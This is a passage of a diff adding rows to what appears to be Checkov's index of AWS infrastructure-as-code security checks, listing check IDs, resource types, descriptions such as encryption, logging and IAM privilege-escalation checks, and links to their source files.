[EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | +| 412 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 413 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 414 | CKV_AWS_107 | resource | 
AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 415 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 416 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 417 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | +| 418 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 419 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 420 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 421 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 422 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 423 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | +| 424 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 425 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 426 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 427 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 428 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management 
without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 429 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | +| 430 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 431 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 432 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 433 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 434 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 435 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege 
escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) |
+| 436 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 437 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 438 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 439 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 440 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
+| 441 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) |
+| 442 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | 
[SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) |
+| 443 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) |
+| 444 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) |
+| 445 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
+| 446 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
+| 447 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
+| 448 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | 
[LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
+| 449 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
+| 450 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) |
+| 451 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
+| 452 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
+| 453 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) |
+| 454 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
+| 455 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | 
[RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
+| 456 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
+| 457 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) |
+| 458 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) |
+| 459 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
+| 460 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
+| 461 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) |
+| 462 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | 
[ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) |
+| 463 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) |
+| 464 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
+| 465 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
+| 466 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) |
+| 467 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) |
+| 468 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | 
[ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) |
+| 469 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) |
+| 470 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) |
+| 471 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) |
+| 472 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
+| 473 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) |
+| 474 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
+| 475 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) |
+| 476 | CKV_AWS_134 | resource | aws_elasticache_cluster | 
Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) |
+| 477 | CKV_AWS_135 | resource | [?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 478 | CKV_AWS_135 | resource | [?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 479 | CKV_AWS_135 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 480 | CKV_AWS_135 | resource | [].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 481 | CKV_AWS_135 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 482 | CKV_AWS_135 | resource | [].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 483 | CKV_AWS_135 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) 
|
+| 484 | CKV_AWS_135 | resource | [].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 485 | CKV_AWS_135 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 486 | CKV_AWS_135 | resource | [].tasks[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 487 | CKV_AWS_135 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 488 | CKV_AWS_135 | resource | [].tasks[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 489 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 490 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 491 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | 
[EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 492 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 493 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) |
+| 494 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) |
+| 495 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) |
+| 496 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
+| 497 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
+| 498 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) |
+| 499 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure 
that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) |
+| 500 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) |
+| 501 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) |
+| 502 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) |
+| 503 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) |
+| 504 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
+| 505 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
+| 506 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are 
encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
+| 507 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
+| 508 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) |
+| 509 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) |
+| 510 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) |
+| 511 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) |
+| 512 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) |
+| 513 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion 
protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
+| 514 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
+| 515 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
+| 516 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
+| 517 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) |
+| 518 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
+| 519 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
+| 520 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | 
[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
+| 521 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
